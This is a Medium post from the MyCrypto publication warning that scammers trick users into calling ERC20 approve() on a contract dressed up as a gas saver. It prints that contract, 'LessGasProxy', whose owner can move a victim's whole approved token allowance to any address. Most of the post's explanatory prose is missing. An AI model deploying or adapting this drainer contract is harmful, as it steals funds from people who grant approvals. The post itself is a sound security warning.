MyCrypto
Published in

MyCrypto

Bad Actors Abusing ERC20 Approval to Steal Your Tokens!

Be careful with what parameters you call approve() with!

Average gas prices for the last 3 days
A screenshot of the action they want the user to perform
pragma solidity 0.6.12;interface IERC20Token {
function allowance(address _owner, address _spender) external view returns (uint256);
function transferFrom(address _from, address _to, uint256 _value) external returns (bool);
}
contract LessGasProxy {
address public owner;
constructor() public {
owner = msg.sender;
}
function transferFrom(IERC20Token _token, address _sender, address _receiver) external returns (bool) {
require(msg.sender == owner, "access denied");
uint256 amount = _token.allowance(_sender, address(this));
return _token.transferFrom(_sender, _receiver, amount);
}
function transferGas(IERC20Token _token, address _sender, address _receiver, uint256 _amount) external returns (bool) {
require(msg.sender == owner, "access denied");
return _token.transferFrom(_sender, _receiver, _amount);
}
}

How can I stay safe?

Talk To Us & Share Your Thoughts

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store